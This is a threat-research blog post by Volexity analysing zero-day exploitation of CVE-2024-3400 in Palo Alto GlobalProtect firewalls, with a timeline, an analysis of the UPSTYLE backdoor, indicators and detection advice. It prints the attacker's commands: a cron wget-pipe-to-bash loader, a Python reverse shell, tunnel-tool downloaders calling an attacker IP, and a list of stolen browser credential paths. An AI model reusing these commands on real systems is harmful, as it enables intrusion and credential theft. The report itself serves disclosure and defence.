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April 12, 2024

by Volexity Threat Research

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> Volexity would like to thank Palo Alto Networks for their partnership,
> cooperation, and rapid response to this critical issue. Their research can be
> found here.

On April 10, 2024, Volexity identified zero-day exploitation of a vulnerability
found within the GlobalProtect feature of Palo Alto Networks PAN-OS at one of
its network security monitoring (NSM) customers. Volexity received alerts
regarding suspect network traffic emanating from the customer’s firewall. A
subsequent investigation determined the device had been compromised. The
following day, April 11, 2024, Volexity observed further, identical exploitation
at another one of its NSM customers by the same threat actor.

The threat actor, which Volexity tracks under the alias UTA0218, was able to
remotely exploit the firewall device, create a reverse shell, and download
further tools onto the device. The attacker focused on exporting configuration
data from the devices, and then leveraging it as an entry point to move
laterally within the victim organizations.

Volexity worked closely with its customer and the Palo Alto Networks Product
Security Incident Response Team (PSIRT) to investigate the root cause of the
compromise. Through this cooperative investigation, the Palo Alto Networks PSIRT
team was able to confirm the vulnerability as an OS command injection issue and
assigned it CVE-2024-3400. The issue is an unauthenticated remote code execution
vulnerability with a CVSS base score of 10.0. Palo Alto Networks has since
issued an advisory for CVE-2024-3400 that includes information regarding a
threat protection signature released to customers, as well as a timeline for a
fix, which at the time of writing is expected April 14, 2024.

During its investigation, Volexity observed that UTA0218 attempted to install a
custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The
UPSTYLE backdoor allows the attacker to execute additional commands on the
device via specially crafted network requests. Details on this backdoor are
included further on in this report.

As Volexity broadened its investigation, it discovered successful exploitation
at multiple other customers and organizations dating back to March 26, 2024.
Those attempts appear to be the threat actor testing the vulnerability by
placing zero-byte files on firewall devices to validate exploitability. On April
7, 2024, Volexity observed the attacker attempting and failing to deploy a
backdoor on a customer’s firewall device. Three days later, on April 10, 2024,
UTA0218 was observed exploiting firewall devices to successfully deploy
malicious payloads. A second compromise Volexity observed on April 11, 2024,
followed a nearly identical playbook. A timeline associated with the discovery
and subsequent activities is below.

After successfully exploiting devices, UTA0218 downloaded additional tooling
from remote servers they controlled in order to facilitate access to victims’
internal networks. They quickly moved laterally through victims’ networks,
extracting sensitive credentials and other files that would enable access during
and potentially after the intrusion. The tradecraft and speed employed by the
attacker suggests a highly capable threat actor with a clear playbook of what to
access to further their objectives. Volexity is not currently able to provide an
estimate as to the scale of exploitation taking place. It is likely the firewall
device exploitation, followed by hands-on-keyboard activity, was limited and
targeted. However, as noted previously, evidence of potential reconnaissance
activity involving more widespread exploitation aimed at identifying vulnerable
systems does appear to have occurred at the time of writing.

Volexity strongly recommends organizations using Palo Alto Networks
GlobalProtect firewall devices read the advisory to ensure their firewall
devices have the correct protections in place, or otherwise take mitigation
actions to ensure they are no longer vulnerable. As always, it should be noted
that these mitigations and fixes will not remediate an existing compromise.
Affected organizations should rapidly investigate their systems and networks for
potential breaches.

This blog post describes the malware the attacker added to compromised devices,
observed attempts at lateral movement, and methods organizations can use to
identify potential compromise of their networks.



Volexity used telemetry from its own network security sensors, client endpoint
detection, response (EDR) software, and forensic data collected from multiple
systems to paint a thorough picture of the attacker’s actions in the incidents

Below are the highlights of Volexity’s observations from the course of the
performed investigations:

 * Zero-day exploitation of a vulnerability in Palo Alto Global Protect firewall
   devices that allowed for unauthenticated remote code execution to take place.
   Initial exploitation was used to create a reverse shell, download tools,
   exfiltrate configuration data, and move laterally within the network.
 * The threat actor has developed and attempted to deploy a novel python-based
   backdoor that Volexity calls UPSTYLE.
 * The earliest evidence of attempted exploitation observed by Volexity thus far
   is on March 26, 2024 when attackers appeared to verify that exploitation
   worked correctly.
 * The initial persistence mechanism setup by UTA0218 involved configuring a
   cron job that would use wget to retrieve a payload from an
   attacker-controlled URL with its output being written to stdout and piped to
   bash for execution. The attacker used this method to deploy and execute
   specific commands and download reverse proxy tooling such as GOST (GO Simple
 * In one case a service account configured for use by the Palo Alto firewall,
   and a member of the domain admins group, was used by the attackers to pivot
   internally across the affected networks via SMB and WinRM.
 * UTA0218’s initial objectives were aimed at grabbing the domain backup DPAPI
   keys and targeting active directory credentials by obtaining the NTDS.DIT
   file. They further targeted user workstations to steal saved cookies and
   login data, along with the users’ DPAPI keys.

 A detailed description of the items summarized above can be found in the
following sections.


In two cases UTA0218 was observed attempting to download and execute a backdoor
Volexity calls UPSTYLE. There were two slight variations of this tool observed
with only minor differences between the files. In one case the filename used by
UTA0218 was update.py. UTA0218 attempted to download and execute this file via
the CVE-2024-3400 but was unsuccessful. However, Volexity was still able to
recover the file for analysis.

Name(s) update.py Size 5.1KB (5187 Bytes) File Type text/plain MD5
0c1554888ce9ed0da1583dbdf7b31651 SHA1 988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9
SHA256 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
VirusTotal First Submitted N/A

The purpose of the update.py script is to deploy a backdoor to the following
path: /usr/lib/python3.6/site-packages/system.pth. The backdoor, written in
Python, starts by an import and its main content is stored as a base64 encoded
blob. The .pth extension is used to append additional paths to a Python module.
Starting with the release of Python 3.5, lines in .pth files beginning with the
text “import” followed by a space or a tab, are executed as described in the
official documentation. Therefore, by creating this file, each time any other
code on the device attempts to import the module, the malicious code is

The commands to be executed are forged by the attacker by requesting a
non-existent web page which contains the specific pattern. The backdoor’s
purpose is to then parse the web server error log
(/var/log/pan/sslvpn_ngx_error.log) looking for the pattern, and to parse and
decode data added to the non-existent URI, executing the command contained
within. The command output is then appended to a CSS file which is a legitimate
part of the firewall

After the command’s execution is complete and the output has been written, the
log entry that was originally read and contained the command is removed from the
sslvpn_ngx_error.log file. Fifteen seconds after execution, the original version
of bootstrap.min.css is also restored to its previous state. The access and
modified timestamps are also restored for both files. Figure 1 shows UPSTYLE
main loop.

Figure 1. UPSTYLE main loop

The overall workflow of the malware is described in Figure 2.

Figure 2. UPSTYLE workflow


For the purpose of this blog post, the following filenames and indicators are
related to the exploitation that occurred on April 10, 2024. However, the reader
should note that in subsequent exploitation, these files were altered by UTA0218
for different victims. Their purpose and operation, however, were fundamentally
the same.

After exploitation, the threat actor established persistence by continuously
fetching and executing the contents of a file named patch. When executed, this
file downloads and executes a remotely hosted file named policy. By modifying
the contents of the policy file, the threat actor was able to execute a variety
of commands on the compromised device. A total of six different permutations of
the policy file were observed by Volexity.

The details of the patch file are shown below:

Name(s) patch Size 160.0B (160 Bytes) File Type text/plain MD5
d31ec83a5a79451a46e980ebffb6e0e8 SHA1 a7c6f264b00d13808ceb76b3277ee5461ae1354e
SHA256 35a5f8ac03b0e3865b3177892420cb34233c55240f452f00f9004e274a85703c
VirusTotal First Submitted N/A

The contents of the patch file are shown below:

> if [ ! -f '/etc/cron.d/update' ]; then
>     printf "SHELL=/bin/bash\n\n* * * * * root wget -qO-
> http://172.233.228[.]93/policy | bash\n\n" > /etc/cron.d/update
> fi

When executed, it checks for the existence of a cron file named update. If this
cron file does not exist, it creates the file and uses it to establish a cron
job. It also downloads a remotely hosted file named policy and executes it via
bash every 60 seconds. The attacker then manually updates the contents of the
remote file over time to retrieve data from the device and create a reverse

Interestingly, the attacker appeared to manually manage an access control list
for this command-and-control (C2) server, as it could not be accessed on the
same port from any location other than the device communicating with it.


Six different versions of the policy file were observed by Volexity. They each
represent a different set of actions taken by the threat actor on a compromised
device. The numbered versions that follow are the order in which they were used
by the threat actor.

Version 1

This file contained a one-liner reverse shell written in Python.

Name(s) policy Size 287B (287 Bytes) File Type text/x-shellscript MD5
a43e3cf908244f85b237fdbacd8d82d5 SHA1 e1e427c9b46064e2b483f90b13490e6ef522cc06
SHA256 755f5b8bd67d226f24329dc960f59e11cb5735b930b4ed30b2df77572efb32e8
VirusTotal First Submitted N/A

> #!/bin/bash
> r=`ps -ef | grep "import sys,socket,os" | grep -v grep`
> if [[ -z "$r" ]]; then
>     python -c "import sys,socket,os,pty;s=socket.socket(socket.AF_INET,
> socket.SOCK_STREAM);s.connect(('172.233.228[.]93',443));[os.dup2(s.fileno(),fd)
> for fd in (0,1,2)];pty.spawn('/bin/bash')"
> fi

Version 2

The attacker removed any previously created CSS files containing various
attacker command output, and then copied the configuration data from the
firewall device into a new file, storing the hostname of the device in the CSS
file. These files were saved to an externally accessible web directory where the
attacker could subsequently retrieve them.

Name(s) policy Size 216B (216 Bytes) File Type text/x-shellscript MD5
5e4c623296125592256630deabdbf1d2 SHA1 d12b614e9417c4916d5c5bb6ee42c487c937c058
SHA256 adba167a9df482aa991faaa0e0cde1182fb9acfbb0dc8d19148ce634608bab87
VirusTotal First Submitted N/A

> #!/bin/bash
> rm -f /var/appweb/sslvpndocs/global-protect/*.css
> cp /opt/pancfg/mgmt/saved-configs/running-config.xml
> /var/appweb/sslvpndocs/global-protect/<redacted>.css
> uname -a > /var/appweb/sslvpndocs/global-protect/<redacted>.css

Version 3

This file was used to remove CSS files created in the previous step.

Name(s) policy Size 62B (62 Bytes) File Type text/x-shellscript MD5
87312a7173889a8a5258c68cac4817bd SHA1 3ad9be0c52510cbc5d1e184e0066d14c1f394d4d
SHA256 c1a0d380bf55070496b9420b970dfc5c2c4ad0a598083b9077493e8b8035f1e9
VirusTotal First Submitted N/A

> #!/bin/bash
> rm -f /var/appweb/sslvpndocs/global-protect/*.css

Version 4

This version attempts to download a Golang tunneling tool named GOST and execute
it with two different command-line options to establish SOCKS5 and RTCP tunnels.
However, the threat actor appears to have failed to successfully download the
tool on this attempt.

Name(s) policy Size 388B (388 Bytes) File Type text/x-shellscript MD5
b9f5e9db9eec8d1301026c443363cf6b SHA1 d7a8d8303361ffd124cb64023095da08a262cab4
SHA256 fe07ca449e99827265ca95f9f56ec6543a4c5b712ed50038a9a153199e95a0b7
VirusTotal First Submitted N/A

> #!/bin/bash
> wget http://172.233.228[.]93/vpn_prot.gz -O /tmp/vpn_prot.gz
> ls -l /tmp/vpn_prot.gz > /var/appweb/sslvpndocs/global-protect/u.css
> gzip -d /tmp/vpn_prot.gz
> chmod +x /tmp/vpn_prot
> nohup /tmp/vpn_prot -L=socks5://127.0.0[.]1:8123 > /dev/null 2>&1 &
> nohup /tmp/vpn_prot -L rtcp://127.0.0[.]1:8080/127.0.0[.]1:8123 -F
> ssh://user0:[password_redacted]@172.233.228[.]93:8443?ping=180 > /dev/null
> 2>&1 &

Version 5

This is a modified version of Version 4 that successfully downloads GOST in a
base64-encoded format.

Name(s) policy Size 421B (421 Bytes) File Type text/x-shellscript MD5
12b5e30c2276664e87623791085a3221 SHA1 f99779a5c891553ac4d4cabf928b2121ca3d1a89
SHA256 96dbec24ac64e7dd5fef6e2c26214c8fe5be3486d5c92d21d5dcb4f6c4e365b9
VirusTotal First Submitted N/A

> #!/bin/bash
> wget http://172.233.228[.]93/vpn.log -O /tmp/vpn.log
> base64 -d /tmp/vpn.log > /tmp/vpn_prot.gz
> ls -l /tmp/vpn_prot.gz > /var/appweb/sslvpndocs/global-protect/u.css
> gzip -d /tmp/vpn_prot.gz
> chmod +x /tmp/vpn_prot
> nohup /tmp/vpn_prot -L=socks5://127.0.0[.]1:8123 > /dev/null 2>&1 &
> nohup /tmp/vpn_prot -L rtcp://127.0.0[.]1:8080/ -F
> ssh://user0:[password_redacted]@172.233.228[.]93:8443?ping=180 > /dev/null
> 2>&1 &

The details of the GOST sample are as follows:

Name(s) gost-linux-amd64 Size 12.9MB (13578240 Bytes) File Type ELF MD5
089801d87998fa193377b9bfe98e87ff SHA1 4ad043c8f37a916761b4c815bed23f036dfb7f77
SHA256 448fbd7b3389fe2aa421de224d065cea7064de0869a036610e5363c931df5b7c
VirusTotal First Submitted 2023-01-29 01:30:47 UTC | af632c50 (api) - Unknown US

Version 6

This file contains commands to download and execute an open-source reverse shell
that operates over SSH. The threat actor configures this shell to run on port

Name(s) policy(6) Size 189.0B (189 Bytes) File Type text/x-shellscript MD5
724c8059c150b0f3d1e0f80370bcfe19 SHA1 5592434c40a30ed2dfdba0a86832b5f2eaaa437c
SHA256 e315907415eb8cfcf3b6a4cd6602b392a3fe8ee0f79a2d51a81a928dbce950f8
VirusTotal First Submitted N/A

> #!/bin/bash
> wget http://172.233.228[.]93/lowdp -O /tmp/lowdp
> ls -l /tmp/lowdp > /var/appweb/sslvpndocs/global-protect/u.css
> chmod +x /tmp/lowdp
> nohup /tmp/lowdp -l -p 31289 > /dev/null 2>&1 &

Details of the binary are shown below:

Name(s) reverse-sshx64 Size 3.5MB (3690496 Bytes) File Type ELF MD5
427258462c745481c1ae47327182acd3 SHA1 ef8036eb4097789577eff62f6c9580fa130e7d56
SHA256 161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6
VirusTotal First Submitted 2022-08-08 18:30:19 UTC | 1c0b809a (web) - Unknown NL


In one instance of successful compromise, a highly privileged service account
used by the Palo Alto Networks firewall device was used by the attacker to pivot
into the internal network via SMB and WinRM. The targeted data included the
Active Directory database (ntds.dit), key data (DPAPI) and Windows event logs

In addition to Windows-related data, the attacker also stole Login Data,
Cookies, and Local State data for Chrome and Microsoft Edge from specific
targets. With this data, the attacker was able to grab the browser master key
and decrypt sensitive data, such as stored credentials.

The list of files grabbed by the attacker is below:

%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
%LOCALAPPDATA%\Google\Chrome\User Data\Local State
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Network
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Network\Cookies
%LOCALAPPDATA%\Microsoft\Edge\User Data\Local State
%APPDATA%\Roaming\Microsoft\Protect\<SID> -> DPAPI Keys

UTA0218 was not observed deploying malware or additional methods of persistence
on systems within victim networks. This may be due in part to the rapid
detection and response by Volexity and its customers. The stolen data did allow
the attacker to effectively compromise credentials for all domain accounts.
Further, the attacker gained access and could potentially use valid credentials
or cookies taken from browser data for specific user workstations accessed.


Volexity observed UTA0218 leveraging a mix of infrastructure during their
operations, which can be broadly broken into two categories:

 * C2 infrastructure hosting malware, used for communication channels
 * Anonymized source infrastructure, used to access tooling and interact with
   victim infrastructure

The anonymized infrastructure appears to have included a mix of VPN usage, as
well as potentially compromised ASUS routers. The infrastructure was used to
access files created by the attacker. Additionally, UTA0218 abused a compromised
AWS bucket and various Virtual Private Servers (VPS) providers to store
malicious files. The infrastructure observed by Volexity does not have any
overlaps with other threat actors in Volexity’s aperture at this time.


There are two primary methods for identifying compromise on an impacted firewall
device. The first method involves monitoring network traffic and activity
emanating from Palo Alto Networks firewall devices. Volexity is still working to
coordinate with Palo Alto Networks regarding the second method and thus is not
describing it at this time. Volexity will update this blog post when more
details can be made available.

The section that follows describes what organizations can do to look for signs
of compromise. Any of these methods can provide strong evidence that the Palo
Alto Networks GlobalProtect firewall device is compromised. Should signs of
compromise be identified, refer to Responding to Compromise for what to do next.


Volexity initially identified activity that led to the discovery of the Palo
Alto Networks GlobalProtect firewall device exploitation via an alert for
malicious network requests generated by Volexity's NSM sensors. Review of
network traffic logs for outbound connections originating from the GlobalProtect
firewall device, as well as destined for the device, can help identify anomalous
activity. Example activity that Volexity observed from compromised GlobalProtect
devices includes the following:

 * Direct-to-IP HTTP requests to download files noted in the previous section
   via wget
   While it would not be uncommon to observe wget requests for files in a larger
   environment, this type of request originating from the firewall device is not
   something Volexity has observed outside of the attacker activity.
 * SMB / RDP connections to multiple systems across the environment, originating
   from the GlobalProtect appliance
 * SMB file transfers of Google Chrome or Microsoft Edge browser data or the
   ntds.dit file
 * HTTP request for the URL worldtimeapi[.]org/api/timezone/etc/utc originating
   from the Global Protect appliance
   While this hostname is legitimate, in both occurrences of compromise an HTTP
   GET request to this URL was observed. This does not appear to be a commonly
   occurring network request.

Volexity also leveraged its customer’s Endpoint Detection and Response (EDR)
software to investigate alerts that triggered for data exfiltration over SMB.
Having both network visibility and EDR telemetry allowed Volexity to fully map
out all systems the attacker accessed via the compromised GlobalProtect firewall


During Volexity’s incident response investigations, the affected customers were
able to generate a tech support file from the compromised firewall devices. This
tech support file is an archive that contains files Palo Alto Networks tech
support can use to troubleshoot issues organizations are having with their
firewall devices. It also contains logs Volexity noted as having key forensic
artifacts and could potentially help determine if a device is compromised.

To generate a tech support file, Palo Alto GlobalProtect system administrators
can navigate within the WebGUI to the Device tab, or if in Panorama to the
Panorama tab. From here, navigate to the “Support” page and look under the Tech
Support File section for "Generate Tech Support File.” Clicking this will
generate a tech support file that can be downloaded by selecting “Download Tech
Support File” when it becomes available. This may also be done via the
command-line interface using one of two commands:

 * tftp export tech-support to <tftp host>
 * scp export tech-support to <username@host:path>

More information on this process from Palo Alto Networks can be found here.


Collecting volatile memory from potentially compromised devices requires
assistance from Palo Alto Networks technical support. It is not currently
possible for Palo Alto Networks customers to collect memory on their own. Due to
these collection challenges, Volexity products currently do not officially
support Palo Alto Networks firewall devices.


Volexity regularly leverages memory forensics when investigating or confirming
compromises. Due to the sensitive nature of the artifacts in memory and the
pending coordination efforts with Palo Alto Networks, Volexity will share more
details of this analysis with Volexity Volcano in a future update.


If you discover that your Palo Alto Network GlobalProtect firewall device is
compromised, it is important to take immediate action. Make sure to not wipe or
rebuild the appliance. Collecting logs, generating a tech support file, and
preserving forensics artifacts (memory and disk) from the device are crucial.

Pivoting to analyzing internal systems and tracking potential lateral movement
should be done as soon as possible. Further, any credentials, secrets, or other
sensitive data that may have been stored on the GlobalProtect firewall device
should be considered compromised. This may warrant password resets, changing of
secrets, and additional investigations.

Volexity strongly recommends that organizations look for signs of lateral
movement internally from their Palo Alto Networks GlobalProtect firewall device
that is not consistent with expected behavior. Proactive checks of any
externally facing infrastructure may also be warranted if internal visibility is

If you need assistance validating or responding to a breach, please feel free to
contact Volexity for breach assistance.


Targeting edge devices remains a popular vector of attack for capable threat
actors who have the time and resources to invest into researching new
vulnerabilities. Having a robust detection stack is critical in identifying
activity related to exploits, inclusive of network monitoring and EDR
capabilities to identify lateral movement. Early detection of intrusions greatly
reduces the scope and costs associated to mitigation.

Volexity tracks activity described in this blog post under the moniker UTA0218.
At the time of writing, Volexity was unable to link the activity to other threat
activity. Volexity assesses that it is highly likely UTA0218 is a state-backed
threat actor based on the resources required to develop and exploit a
vulnerability of this nature, the type of victims targeted by this actor, and
the capabilities displayed to install the Python backdoor and further access
victim networks.

As with previous public disclosures of vulnerabilities in these kinds of
devices, Volexity assesses that it is likely a spike in exploitation will be
observed over the next few days by UTA0218 and potentially other threat actors
who may develop exploits for this vulnerability. This spike in activity will be
driven by the urgency of this window of access closing due to mitigations and
patches being deployed. It is therefore imperative that organizations act
quickly to deploy recommended mitigations and perform compromise reviews of
their devices to check whether further internal investigation of their networks
is required.

This blog post provided guidance on prevention and detection; related indicators
can also be downloaded from the Volexity GitHub page:

 * YARA rules
 * Single value indicators

> For more information about Volexity's Network Security Monitoring service
> or Volexity's leading memory analysis product, Volexity Volcano, please do not
> hesitate to contact us.

0day, APT, Exploit, firewall, Global Protect, Palo Alto Networks, RCE, zero-day
 * Search for:

    * Zero-Day Exploitation of Unauthenticated Remote Code Execution
      Vulnerability in GlobalProtect (CVE-2024-3400)
    * CharmingCypress: Innovating Persistence
    * How Memory Forensics Revealed Exploitation of Ivanti Connect Secure VPN
      Zero-Day Vulnerabilities
    * Ivanti Connect Secure VPN Exploitation: New Observations
    * Ivanti Connect Secure VPN Exploitation Goes Global

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